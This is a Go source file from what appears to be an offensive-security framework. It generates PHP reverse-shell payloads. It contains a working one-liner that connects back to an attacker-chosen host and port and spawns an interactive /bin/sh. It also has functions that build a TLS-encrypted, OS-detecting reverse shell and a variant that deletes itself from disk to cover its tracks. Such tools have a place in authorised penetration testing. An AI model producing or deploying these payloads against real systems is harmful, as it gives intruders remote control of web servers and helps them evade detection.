-
Notifications
You must be signed in to change notification settings - Fork 34
/
Copy pathphp.go
51 lines (42 loc) · 1.66 KB
/
php.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package reverse
import (
_ "embed"
"fmt"
"strings"
)
var (
PHPDefault = PHPLinuxInteractive
PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>`
//go:embed php/unflattened.php
PHPUnflattened string
//go:embed php/unflattened_self_delete.php
PHPUnflattenedSelfDelete string
)
func (php *PHPPayload) Default(lhost string, lport int) string {
return strings.Trim(php.LinuxInteractive(lhost, lport), "\r\n")
}
// A short payload that creates a reverse shell using /bin/sh -i.
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string {
return strings.Trim(fmt.Sprintf(PHPDefault, lhost, lport), "\r\n")
}
// Creates an encrypted reverse shell using PHP. The payload autodetects the operating system and
// will selected cmd.exe or /bin/sh accordingly.. The user also specifies if the reverse shell
// should be encrypted or not.
//
// reverse.PHP.Unflattened("10.9.49.80", 1270, true).
func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string {
hostname := fmt.Sprintf("%s:%d", lhost, lport)
if encrypted {
hostname = "tls://" + hostname
}
return strings.Trim(fmt.Sprintf(PHPUnflattened, hostname), "\r\n")
}
// Creates an encrypted reverse shell using PHP, same as Unflattened, but attempts to self-delete
// and sets up destructors to delete file on disk when command exits.
func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string {
hostname := fmt.Sprintf("%s:%d", lhost, lport)
if encrypted {
hostname = "tls://" + hostname
}
return strings.Trim(fmt.Sprintf(PHPUnflattenedSelfDelete, hostname), "\r\n")
}